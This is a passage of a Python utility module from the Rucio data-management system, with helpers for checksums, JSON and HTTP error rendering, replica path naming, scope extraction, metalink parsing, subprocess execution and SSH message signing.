EXTRA_MODULES[extra_module] = True
except ImportError:
EXTRA_MODULES[extra_module] = False
if EXTRA_MODULES['web']:
from web import HTTPError
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
if EXTRA_MODULES['flask']:
from flask import Response
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
"""
utitily function to build an url for requests to the rucio system.
If the optional parameter doseq is evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
def oidc_identity_string(sub, iss):
"""
Transform IdP sub claim and issuers url into users identity string.
:param sub: users SUB claim from the Identity Provider
:param iss: issuer (IdP) https url
:returns: OIDC identity string "SUB=<usersid>, ISS=https://iam-test.ch/"
"""
return 'SUB=' + str(sub) + ', ISS=' + str(iss)
def sqlalchemy_obj_to_dict(sqlalchemyresult):
"""
Makes dictionary from SQLAlchemy query result object
:param sqlalchemyresult:
:returns: dictionary
"""
res_dict = copy.deepcopy(dict(sqlalchemyresult.__dict__))
del res_dict['_sa_instance_state']
return res_dict
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
returns false otherwise. audience and scope must be both strings
or both lists. Similarly for required_* variables.
If this condition is satisfied, False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and # NOQA: W504
isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
def clean_headers(msg):
invalid_characters = ['\n', '\r']
for c in invalid_characters:
msg = str(msg).replace(c, ' ')
return msg
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'rb') as openFile:
for line in openFile:
adler = zlib.adler32(line, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
with open(file, "rb") as f:
bytes = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only supported date-like format
# supported at dmain schema level is 'datetime' .
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, EnumSymbol):
return obj.description
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(l):
""" JSON render function for list
"""
return json.dumps(l, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
ret_obj = None
try:
ret_obj = data.decode('utf-8')
except AttributeError:
ret_obj = data
return json.loads(ret_obj, object_hook=datetime_parser)
def generate_http_error(status_code, exc_cls, exc_msg):
"""
utitily function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a web.py HTTP response object.
"""
status = codes[status_code]
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
headers = {'Content-Type': 'application/octet-stream',
'ExceptionClass': exc_cls,
'ExceptionMessage': clean_headers(exc_msg)}
try:
return HTTPError(status, headers=headers, data=render_json(**data))
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def generate_http_error_flask(status_code, exc_cls, exc_msg):
"""
utitily function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a web.py HTTP response object.
"""
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
resp = Response(response=render_json(**data), status=status_code, content_type='application/octet-stream')
resp.headers['ExceptionClass'] = exc_cls
resp.headers['ExceptionMessage'] = clean_headers(exc_msg)
try:
return resp
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = ''
err = ''
exitcode = 0
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out, err
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(l), n):
yield l[i:i + n]
def my_key_generator(namespace, fn, **kw):
"""
Customyzed key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def get_logger(name):
logger = getLogger(name)
hdlr = RotatingFileHandler('%s/%s.log' % (config_get('common', 'logdir'), name), maxBytes=1000000000, backupCount=10)
formatter = Formatter('%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(config_get('common', 'loglevel').upper())
return logger
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
# ensure that policy package is loaded in case it registers its own algorithms
import rucio.common.schema # noqa: F401
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub('/srm/managerv1\?SFN=', '', surl) # NOQA: W605
surl = re.sub('/srm/v2/server\?SFN=', '', surl) # NOQA: W605
surl = re.sub('/srm/managerv2\?SFN=', '', surl) # NOQA: W605
res.append(surl)
res.sort()
return res
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'merge1', 'skim']:
return 'mc_tmp', did
return 'mc', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']:
return 'data_tmp', did
return 'data', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/'):
return 'test', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=[]):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
def extract_scope(did, scopes=None):
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = _DEFAULT_EXTRACT
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Open a UDP socket to a machine on the internet, to get the local IPv4 and IPv6
addresses of the requesting client.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
"""
ip = '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
ip6 = '::'
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip6 = s.getsockname()[0]
except Exception:
pass
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
return {'ip': ip,
'ip6': ip6,
'fqdn': socket.getfqdn(),
'site': site}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse.urlparse(url))
mod_query = dict(urlparse.parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlparse.urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and an unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action fucntion should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(interval - ((time.time() - starttime)))
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def query_bunches(query, bunch_by):
"""
Queries output by yield_per sqlalchemy function
(which in a for loop returns rows one by one).
Groups the query rows in bunches of bunch_by
elements and returns list of bunches.
:param query: sqlalchemy session query
:param bunch_by: integer number
:returns: [[bunch_of_tuples_1],[bunch_of_tuples_2],...]
"""
filtered_bunches = []
item_bunch = []
for i in query.yield_per(bunch_by):
# i is either tuple of one element (token/model object etc.)
if not isinstance(i, tuple) and not isinstance(i, list):
item_bunch.append(i)
# or i is a tuple with the column elements per row
else:
item_bunch += i
if len(item_bunch) % bunch_by == 0:
filtered_bunches.append(item_bunch)
item_bunch = []
if item_bunch:
filtered_bunches.append(item_bunch)
return filtered_bunches
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
:param args parametres of the func
